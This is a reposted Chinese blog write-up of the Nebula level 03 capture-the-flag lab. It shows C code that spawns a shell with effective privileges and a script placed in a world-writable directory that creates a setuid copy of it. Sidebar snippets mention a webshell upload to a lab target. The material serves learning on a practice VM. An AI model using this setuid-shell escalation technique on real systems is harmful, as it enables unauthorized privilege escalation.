Nebula Challenge 03

最新推荐文章于 2024-09-16 01:26:52 发布

weixin_30646315

最新推荐文章于 2024-09-16 01:26:52 发布

阅读量68

点赞数

文章标签： shell

原文链接：http://www.cnblogs.com/iamgroot/p/9355281.html

版权

/home/flag03 目录下有 writable.d 文件夹和 writable.sh 文件，查看.sh文件的内容，发现这个脚本是将writable.d文件夹里的内容执行5秒，然后kill 进程，并删除文件。

这个writable.sh脚本是flag03用户每隔几分钟运行一次；writable.d文件夹是所有用户可写的

可以仿照第一题的C

#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main() {
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    system("/bin/bash");
}

对其进行编译链接，得到可执行文件 /tmp/Getflag ，然后在writable.d文件夹中创建.sh文件

1 #!/bin/sh
2 cp /tmp/Getflag /tmp/Getflag2
3 chmod u+s /tmp/Getflag2

这样，一旦flag03的程序运行了.sh文件，就会在/tmp 目录下创建属于 flag03 的 Getflag2，并且设置了set-user-id位，这个时候再去运行Getflag03文件，就会产生 flag03 下的 shell 。

转载于:https://www.cnblogs.com/iamgroot/p/9355281.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30646315

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

通过UNIX域套接字传递文件描述符

weixin_34279184的博客

07-18

191

为什么80%的码农都做不了架构师？>>> ...

Nebula Challenge 04

weixin_30429201的博客

07-23

考察点：软链接 ln -s target_filename symlink_filename将上述命令中的target_filename用符号链接将要指向的相对路径或者绝对路径进行替换。在通常的情况下，目标文件应该存在。但是也可以创建一个指向不存在目标的符号链接。将symlink_filename用希望的符号链接名替换。这条ln命令将会创建一条符号链接。当创建完符号链接之后，可以将syml...

参与评论您还未登录，请先登录后发表或查看评论

nebula 0

无心插柳

08-28

6847

最近发现了一个练习漏洞发掘的好东西exploit-exercises，走进去看了看，恰好适合我这种什么都不懂的新手有对此特别感兴趣的，就打算跟着一步一步的开始练习了。如果全部练习都能通过的话，也可以算linux hack 入门了。首先介绍一下这个练习的环境以及方向，需要具备的基本知识体系。网站提供的练习平台是在虚拟机下的ubuntu 字符界面。 1.只有字符界面而没有图形界面，所以

Nebula Device项目的设计哲学

weixin_30333885的博客

07-12

Integration is better than implementation 外部集成优于内部实现Make extensive use of existing libraries – DevIL, Tcl, Lua, Python, TinyXML, D3DX, SQLite… 大量使用已有的库Throwing away source code can be good 扔掉源代码更好Modu...

Nebula通关指南

weixin_30345577的博客

06-16

758

level 00 这个一题的目的是找到一个suid的文件，已经提示了是看find的文档，很简单。用find的-perm选项即可。 level00@nebula$ find / -perm -4000 > res.txt 查找完成后会看到一个/bin/.../flag00，运行后即可。 level00@nebula$ /bin/.../flag00 flag00@nebula$ ge...

？？Ansible——ad-hoc

sq2048935747@163.com的博客

09-11

587

？？

chsh：修改默认shell

qq_38641599的博客

09-12

448

本文详细介绍 Linux chsh命令的详细用法。

衡石分析平台使用手册-部署前准备

zandy1011的博客

09-12

1629

除 gpdb 的镜像地址不同,其余组件均替换为导入的离线镜像 tag eg. image: hengshi-sense:5.0-20231103-dp-427c5f image: gpdb:x.x.x k8s/helm 环境需要将镜像推送到集群所使用的镜像仓库，如 registry、harbor、阿里云镜像仓库、腾讯云镜像仓库。2.写 new_host_file (新增 segment 列表, 比如原有2个 segment(0,1), 现扩容到4个 segment(0,1,2,3))

瑞芯微RK3568鸿蒙开发板OpenHarmony系统修改cfg文件权限方法

Industio_CSDN的博客

09-11

407

本文适用于OpenHarmony开源鸿蒙系统修改cfg文件权限方法，深圳触觉智能研发的RK3566、RK3568、RK3588等开发板、主板等产品均适用此教程

sqlguna靶场get shell

m0_73771249的博客

09-13

602

四、发现添加新闻出可以上传图片，在图片中写入一句话木马，上传抓包，将jpg修改为php放行。一、打开靶场，发现一个搜索框，尝试sql注入，发现可以注入，爆破数据库，表名，字段名以及。五、放行得到php文件上传位置，查看php文件，发现上传成功。二、发现密码被MD5，解密后得到密码。三、进入后台界面登陆查看。六、使用蚁剑连接查看。

【Linux取经之路】用户&权限管理

bit_pan的博客

09-12

629

事先，我已经将home目录的权限改为777，也就是说所有用户都具有这个目录的写(w)权限，并且在该目录下，我以root的身份创建了一个名为test的文件，然后我从root切换到普通用户pcz，接着尝试删除root在home目录下创建的文件test，结果还删除的很成功！首先，我创建了一个名为test的文件，我们可以看到，test的所有者和所属组为pcz，所有者对应的权限为rw-，可读可写不可执行，所属组对应的权限为rw-，可读可写不可执行。当我们以普通用户的身份安装软件包的时，往往权限不够，需要提权。

shell脚本之双重循环(详解)

qq_71371157的博客

09-12

2003

双重循环是指在程序中嵌套使用两个循环结构，通常是嵌套使用两个for循环。双重循环可以用来遍历二维数组、二维矩阵等需要两个维度的数据结构，并且可以对其中的元素进行操作。双重循环的执行方式是外层循环执行一次，内层循环执行完整的循环体，然后再次回到外层循环，如此循环执行，直至外层循环完毕。在实际应用中，双重循环经常用于处理二维数组或嵌套数据结构。它可以用于遍历矩阵、搜索匹配项、计算累加值等等。双重循环的效率可能会比较低，因为它需要执行更多的迭代。因此，在设计算法时，需要权衡迭代次数和执行时间。执行示例。

通过shell脚本一键修改Linux主机名和IP地址脚本

pymzy666skr的博客

09-14

1051

在复杂的 Linux 系统管理中，高效准确地进行配置调整是至关重要的任务。当面临需要同时修改主机名和 IP 地址的情况时，手动操作不仅繁琐易错，还会耗费大量的时间和精力。想象一下，在一个庞大的服务器集群环境中，或者在紧急的系统部署场景下，逐个手动修改主机名和 IP 地址的过程是多么令人头疼。而现在，有了一键修改 Linux 主机名和 IP 地址的脚本，这一切都将变得轻松无比。这个脚本的出现，犹如一把神奇的钥匙，为 Linux 系统管理员打开了便捷之门。

DOS脚本分析

YJlio的博客

09-11

313

S-1-5-19是本地服务帐户的安全标识符（SID），通常用于判断是否有足够的权限。：该行命令生成一个VBScript文件，通过Shell对象以管理员权限重新运行当前批处理文件（%~f0表示当前脚本的完整路径，runas表示以管理员权限运行）。else：如果ping失败（即网络连接中断状态），则显示提示信息并进入pause，等待用户按键，然后重新检查网络连接。ping *** >nul：通过ping命令检测指定服务器（***）是否有效。||: 表示如果前面的命令失败，则执行后面的部分。

Android实现关机和重启功能